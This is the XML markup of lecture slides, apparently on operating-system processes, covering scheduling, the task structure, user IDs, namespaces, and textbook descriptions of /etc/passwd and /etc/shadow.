            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Scheduling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Switches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725BA-F9BB-42B8-6B81-923DE6EDD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15" y="2310589"/>
            <a:ext cx="10345046" cy="4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563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21B8-7044-9713-FEA6-7116F68A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Running Programs =  Time Sharing CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Cores</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"Kernel Threads" =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Cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Core</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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94E35A4-F5AE-E60F-7002-6714AD57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0" y="2385305"/>
            <a:ext cx="5038725" cy="334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007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D0CA-508D-DB12-06CD-FCA56B26A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6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Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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BB819-4807-C75C-C0EA-C4DBBE333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12" y="2575144"/>
            <a:ext cx="2000423" cy="94115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CDB140B-E169-BE24-D6C4-AD5FBB23F40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="3271837" y="2502795"/>
            <a:ext cx="1109663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97ABCFA-B47E-39DD-8A27-573A2016D11B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="203108">
            <a:off x="3271836" y="3012382"/>
            <a:ext cx="1109663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C2092A3-8ED4-70D4-ED68-6675DE7BC3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1407172">
            <a:off x="3228973" y="3497767"/>
            <a:ext cx="1109663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5C97197-B122-4F2D-35F2-CDE48C5895A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2600231">
            <a:off x="3228973" y="4002850"/>
            <a:ext cx="1109663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D33456-5C2D-FBB1-E1D4-7044C5B57BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4700502" y="1690688"/>
            <a:ext cx="37553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Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> Memory   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>(dll, exe  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>mapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> files)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58D499-5195-9BF4-20C2-0F75AFE90D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4713369" y="2885367"/>
            <a:ext cx="3767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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  Read-Write Memory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DC034-D697-6B6B-619B-6720AEF5D93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4713369" y="3630648"/>
            <a:ext cx="5728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registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>, stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> state of the process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4E634-06E6-F929-83F1-1510662DB870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751868" y="4308380"/>
            <a:ext cx="6378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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Descriptors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>IOs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>   (Files, Sockets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>Terminals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>, ..)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53680-F0CC-A636-9A43-F2E1C21CA45F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751868" y="5673688"/>
            <a:ext cx="5520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... more Security &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Features</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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559E59E-8C38-8118-CF67-CBB18E408811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="10262332" y="5531861"/>
            <a:ext cx="54982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D73CA6B-FC9B-23BD-A17C-7010700AFDD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21401959">
            <a:off x="10312126" y="5810220"/>
            <a:ext cx="54982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783A6E9-F7DF-6A88-E303-431F60C0E108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1169941">
            <a:off x="10268520" y="6160857"/>
            <a:ext cx="54982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82184B-49C6-2748-659F-A3D5662DBFCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751868" y="5035234"/>
            <a:ext cx="3152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Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> Variables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4511581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9D112-B9AE-64C0-15B7-97B5D707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735DA-5146-24FC-3215-E24E66B1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Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Structure  [2/2]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4E0DC-FFAE-FE2D-C40A-96C3A173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0" y="1865419"/>
            <a:ext cx="2000423" cy="94115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D63B410-19B8-3C52-79CF-39256F593F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2600231">
            <a:off x="2132352" y="2314430"/>
            <a:ext cx="781693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EF007-2003-943B-02E7-E6865AED2CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218127" y="2806571"/>
            <a:ext cx="519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userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> of the 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3DE83A-1DE1-9D66-4936-30C242CE121F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="3553122"/>
            <a:ext cx="4803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FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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root Filesystem "/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> accessible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EFDA6-F00E-53CE-717B-215AACD5DDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801893" y="2670746"/>
            <a:ext cx="2261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Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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DAB9718-13EF-7BB7-EFAF-584CAC537A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="5330582" y="3056340"/>
            <a:ext cx="54982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02C2057-DF4E-5DA4-177C-9D832C322654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21401959">
            <a:off x="5330581" y="3755610"/>
            <a:ext cx="54982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EB0B03C-8B14-3B56-9DDE-75CF1142475D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1169941">
            <a:off x="5324394" y="4464753"/>
            <a:ext cx="54982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1D584-7E84-7259-69E0-DB6608833F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="4505622"/>
            <a:ext cx="5037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Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> are accessible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16B3C75-C154-5676-1704-86400156639F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3057405">
            <a:off x="5339775" y="5314558"/>
            <a:ext cx="54982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C86716-90E6-271C-D564-763EF9F7BAEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283928" y="5576103"/>
            <a:ext cx="4328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Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>, ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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... are accessible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2687416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1E108-6581-D022-CEA4-68BEB87AA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246538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Example of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerabilities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50224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4ABF3-A53B-11D0-EB33-C46B6DCF3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94722-2D6F-4A03-69D4-C56CF3B03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Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Structure -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>UserID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C6DA7-598E-766C-A0F4-73B5D1F3C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0" y="1865419"/>
            <a:ext cx="2000423" cy="94115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1A36533-A99E-F58F-86ED-DB0FB64C5F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2600231">
            <a:off x="2132352" y="2314430"/>
            <a:ext cx="781693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26F0E-EE8D-543A-27FC-94A31A705B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218127" y="2806571"/>
            <a:ext cx="519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userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> of the 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9FB716-9C41-86F0-5F5E-974B84B882B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="3553122"/>
            <a:ext cx="4803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FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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root Filesystem "/" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> accessible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86B565-9517-45DD-4D46-AFD5D2F0B4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801893" y="2670746"/>
            <a:ext cx="2261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Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Virtualization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="24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497FD19-CD7C-F52A-8450-7C4DA6B12EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20742164">
            <a:off x="5330582" y="3056340"/>
            <a:ext cx="54982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D092909-9E26-1854-E653-A16A44AC0793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21401959">
            <a:off x="5330581" y="3755610"/>
            <a:ext cx="54982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C635292-07A6-B517-CC1F-EB07AF0504FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1169941">
            <a:off x="5324394" y="4464753"/>
            <a:ext cx="54982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92A84-1806-D589-A422-179BD245E60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="4505622"/>
            <a:ext cx="5037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Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> are accessible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F219B3A-02F3-4BAE-0A35-23D303A1F051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3057405">
            <a:off x="5339775" y="5314558"/>
            <a:ext cx="54982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72DD1E-9A25-8BDD-C033-002B4991940C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283928" y="5576103"/>
            <a:ext cx="4328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Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0"/>
              <a:t>, ...  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>namespaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  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... are accessible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EEDD34-C122-C038-563C-D7A7B0A40C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063666" y="3553122"/>
            <a:ext cx="6866397" cy="304770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5084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79F5-31DE-593F-B36B-80D1F05E3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process -&gt;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A3C08-FC6A-8927-364D-293389DEB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517" y="1857264"/>
            <a:ext cx="6866215" cy="25338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C5591-BAE2-9725-1368-6A87749022CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024188" y="2476499"/>
            <a:ext cx="800099" cy="219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CDF4D0-23F1-BDCA-9255-32FA21EECC84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024187" y="3181351"/>
            <a:ext cx="800099" cy="219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3196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60012-E661-7BAD-EF7D-7D1D40FF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whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   ,  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pwd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66D94-10BF-7428-1B28-76A7F51A4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968" y="1819174"/>
            <a:ext cx="4634063" cy="308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699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F0EC-C82A-DA35-F733-2269B73F5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15675" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>$ cat /proc/${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>}/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: &lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&gt;&gt;  &lt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&gt;&gt;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61CAE-AA86-8EEE-A23A-5EE8F0F84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408" y="2020084"/>
            <a:ext cx="6485182" cy="38941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2804DF-E61D-D6B8-D026-9943FD151B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3138488" y="4914899"/>
            <a:ext cx="3538537" cy="219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919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7648-FD1A-8988-BE35-C842A5756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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   ...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Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>uid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hashed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,  no more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  ":x:"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F6D82-E82A-17FC-F621-6AEAAA47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2063118"/>
            <a:ext cx="7706105" cy="44297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1C395A-BEC7-2417-1898-8160EBACFA3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2562226" y="5976936"/>
            <a:ext cx="3767137" cy="219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23633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D3B09-8E43-38E2-4194-F3C62FBEA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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>   ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hashed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>passwords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D800F-5D8B-C543-751A-1ED474E12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948" y="1325563"/>
            <a:ext cx="4492379" cy="52011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FDBBBA-3132-A82F-A88A-D2C628730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57" y="2805993"/>
            <a:ext cx="5048688" cy="16651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87E5F0-8452-A080-5A22-C68CD1062464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381751" y="5967412"/>
            <a:ext cx="4672012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A9FDB5-D257-1575-C8D7-EE5369078B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604963" y="3429001"/>
            <a:ext cx="352425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91A644-CC68-A313-2D5C-2A99F4D80175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604963" y="3950054"/>
            <a:ext cx="352425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93DA39-E23A-B460-11BF-D925CBC56839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4586288" y="3429001"/>
            <a:ext cx="1171575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E574E0-4349-8838-3C2B-677BE9C8815F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670488" y="3950054"/>
            <a:ext cx="1087376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8376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A8A3E-CB55-5CFB-F7B5-FC4C39428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EB54C-7ADA-26DC-7A07-5631B4050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Security Notes on Process -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>UserID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D9C03-9AE0-0BB7-0A1F-3DB5A4675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0" y="1865419"/>
            <a:ext cx="2000423" cy="94115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58FF0E-E1E3-9BB2-2664-1060DAC77190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2600231">
            <a:off x="2132352" y="2314430"/>
            <a:ext cx="781693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A4ECF0-5D8E-3892-44A3-935301D380BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218127" y="2806571"/>
            <a:ext cx="519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userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t> of the 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6D6F53-5A65-8100-753B-202451B68250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6273010" y="3553122"/>
            <a:ext cx="4803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FileSystem</a:t>
